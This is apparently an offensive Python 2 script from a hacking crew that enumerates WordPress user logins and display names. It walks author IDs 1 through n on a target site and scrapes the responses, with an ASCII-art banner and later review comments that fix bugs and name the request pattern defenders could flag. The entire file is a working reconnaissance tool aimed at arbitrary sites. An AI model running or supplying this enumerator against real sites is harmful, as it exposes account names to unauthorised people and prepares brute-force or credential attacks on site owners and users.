#!/usr/bin/env python
# CodeD By ./ChmoD
# Enumerate Users WordPress
# Ex: ./EXploit -s http://site.com.br -n 30
# *** Brazilians Hackers Team ***
import urllib2, urllib, sys, argparse
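def banner():
    """Print the author's ASCII-art banner, then pause for one second.

    Nothing in this listing calls this function.
    """
    # `time` is not among the file's top-level imports, so the sleep below
    # raised NameError; import it locally to keep the block self-contained.
    import time

    print ("""
`,+@@@+
.+@@@@@@@;
`;@@@@@@@@@@@
+@@@@@@@@@@@@@:
;@@@@@@@@@@@@@@@@
`@@@@@@@@@@@@@@@@@@`
`@@@@@@@@@@@@@@@@@@#
.@@@@@@@@@@@@@@@@@@,
:@@@@@@@@@@@@@@@@@@ .'@@
#@@@@@@@@@@@@@@@@+; .+@@@@@
`@@@@@@@@@@@@@#;;+@+#@@@#:`
#@@@@@@@@@@';'@@@@@@@:`
`@@@@@@@+;;+@@@@@##`
.@@@#;;+@@@@@#+',.,'.
+;;'#@@@@#+;` ,:
.#@@@@#++: @. ...`
`'@@@@#++'. + .#++;;+ +
,@@@@@#++:``::+ `',:+,. ,
`@@@@#, #+` ',.`'. +` `` `, .+
@@:` ,+. ,`:``.: '. .',+++ #
`` #+`++,.`:,`` :`+@@'@@@@' ````
#'`#+:`.,`:` .@@@+@# +`. : `:
#:: +.`,.., `@@,#@':. + : '
#: ` ',:`,, @#`` + + ' `,;
#: ` `:''` @` #:.. , ' #+++:
#: , ;#'# + : `: #++
#; ' `'' , '.
;' ' # `@# *** Brazilians Hackers Team ***
#.; ;` ,#.:;
`+; '. @ ` Cod3D By ./ChmoD
:#; `@: :` `,
.#+; `'+.' + Skype: BrazilObscure
.@++#'+@+@++` ;@. '
`' ., ` #:`# `+.#+ :.
., : @#;.`;`: `#@.
+``,.;`@+,. '#
@' ' ;`@:+`#`;`
`#+ ,'`# :. '
' #. :`#` '`. +
# +. .:+: :`. .
`, +, ..+ '` :
;` #+@:,:#.;`` '
#'##:#+. : `; ;
#. #: `'` :
#, ` . """)
    time.sleep(1)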
def uniq(lst):
    """Yield the items of ``lst``, collapsing each run of equal neighbours.

    Only adjacent duplicates are dropped, so the input has to be sorted (or
    otherwise grouped) for the output to be globally unique.
    """
    # A fresh object() compares unequal to ordinary items, so the first
    # element is always emitted.
    previous = object()
    for current in lst:
        if not (current == previous):
            yield current
            previous = current
def sort_and_deduplicate(l):
    """Return a new list holding the items of ``l`` in ascending order, duplicates removed."""
    # The script passes a list of dicts here; ordering dicts with sorted()
    # works on Python 2 only (Python 3 raises TypeError).
    ordered = sorted(l)
    return [entry for entry in uniq(ordered)]
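def curllib(req, params=None, postdata=None):
    """Fetch ``req`` and return the response body, or ``False`` on any failure.

    Args:
        req: URL to request.
        params: Unused; kept so existing positional callers keep working.
        postdata: URL-encoded request body. urllib2 issues a POST when this
            is not None and a GET otherwise.

    Returns:
        The body returned by ``read()``, or ``False`` when building, sending
        or reading the request raised an exception (the error is discarded).
    """
    # Fixed, dated browser User-Agent: every request made through this helper
    # carries it, which makes the traffic easy to pick out in access logs.
    headers = {
        'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    try:
        response = urllib2.urlopen(urllib2.Request(req, postdata, headers), timeout=30)
    except Exception:
        return False
    try:
        return response.read()
    except Exception:
        return False
    finally:
        # The original never closed the response, so the socket stayed open
        # until garbage collection.
        response.close()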
def sout(s):
    """Write ``s`` followed by a carriage return to stdout and flush.

    The trailing "\\r" (no newline) moves the cursor back to the start of the
    line, so the next write overprints this one.
    """
    stream = sys.stdout
    stream.write(s + "\r")
    stream.flush()
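def finder(text, start, end, index=1):
    """Return the substring of ``text`` between ``start`` and the next ``end``.

    ``text`` is split on ``start`` and piece number ``index`` is kept (the
    default, 1, is whatever follows the first occurrence of ``start``); the
    result is that piece up to the first ``end``.

    Returns:
        The extracted substring, or "" when ``start`` does not occur often
        enough, when ``text`` is not a string (the script passes ``False``
        after a failed fetch), or when ``start``/``end`` is empty.
    """
    try:
        return text.split(start)[index].split(end)[0]
    # Narrowed from a bare ``except:``, which also swallowed
    # KeyboardInterrupt and SystemExit.
    except (AttributeError, IndexError, TypeError, ValueError):
        return ""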
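def find_username(html=None):
    """Extract an author slug and a display name from a fetched page.

    Args:
        html: Response body to search, or None.

    Returns:
        None when ``html`` is None. Otherwise a dict with
        "user" - the text between the first '/author/' and the next '/', and
        "name" - the <title> content up to its first comma.
        Either value is "" when its marker is absent.
    """
    # NOTE(review): "user" is the author-archive path segment. WordPress
    # normally derives it from the login name, but the two need not be equal.
    # Both values come straight from the remote response and are printed
    # later without sanitising, so a hostile server controls that output.
    if html is None:
        return None
    return {
        "user": finder(html, '/author/', '/'),
        "name": finder(html, '<title>', '</title>').split(',')[0],
    }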
# Main:
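parser = argparse.ArgumentParser(description="Wordpress Enumerate Users", epilog="\033[1mCoded by ChmoD \033[0m")
parser.add_argument('-s', '--site', required=True, default=None, help='target domain or URL')
parser.add_argument('-n', required=True, type=int, default=None, help='numbers of users to enumerate.')
args = vars(parser.parse_args())

results = []
max_login_len = max_name_len = 0
site = urllib2.urlparse.urlparse(args['site'])
usern = args['n']

# urlparse() always returns a non-empty (truthy) tuple, so the original
# `if site:` could never reach the error branch and a value without a scheme
# became "://...". Check the parsed scheme and host instead.
if site[0] in ("http", "https") and site[1]:
    site = site[0] + "://" + site[1] + "/" if site[2] == "" else site[0] + "://" + site[1] + site[2]
    print("[+]: Scanning " + site)
else:
    sys.exit("[#]: Wrong SITE formate (ex):\r\nhttp://target.com/")

# One request per candidate id: a POST to `site` whose body is `author=<n>`
# for n = 1..usern, issued back to back. Server-side, that sequential run of
# `author` values from a single client is the pattern to alert on or
# rate-limit; the parameter travels in the request body, not the query string.
for x in range(0, usern):
    # Multiply before dividing: `100 / usern*x` floors to 0 for every step
    # once usern exceeds 100 (Python 2 integer division).
    sout("[+]: %" + str(100 * x // usern) + "\t")
    tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)}))
    if tmp is False:
        # Failed fetch. The original fell through here and, after an
        # exception, reused the previous iteration's `tmp`.
        continue
    tmp = find_username(tmp)  # pull slug and title out of the response
    if not tmp or not len(tmp['user']):
        continue
    results.append(tmp)
    max_login_len = max(max_login_len, len(tmp['user']))  # widest login column
    max_name_len = max(max_name_len, len(tmp['name']))  # widest name column

if not results:
    print("[ERROR]: Could not find anything, or something went wrong!")
    sys.exit()

results = sort_and_deduplicate(results)  # sort, then drop repeated entries
print("Found " + str(len(results)) + " users in " + site + "")

login_space = (max_login_len - len("Login") + 1) * " "
name_space = (max_name_len - len("Name") + 1) * " "
login_bar = ((max_login_len - len("Login") + 1) + 6) * "-"
name_bar = ((max_name_len - len("Name") + 1) + 5) * "-"
header = "| Id | Login" + login_space + "| Name" + name_space + "|"

# Table head.
print(" +----+" + login_bar + "+" + name_bar + "+")
print(" " + header)
print(" +----+" + login_bar + "+" + name_bar + "+")

# One row per result. "Id" is the row number in the sorted table, not the
# `author` value that produced the entry.
for row_no, entry in enumerate(results, 1):
    id_space = (3 - len(str(row_no))) * " "
    login_space = (max_login_len - len(entry['user']) + 1) * " "
    name_space = (max_name_len - len(entry['name']) + 1) * " "
    print(" | " + str(row_no) + id_space + "| " + entry['user'] + login_space + "| " + entry['name'] + name_space + "|")
print(" +----+" + login_bar + "+" + name_bar + "+")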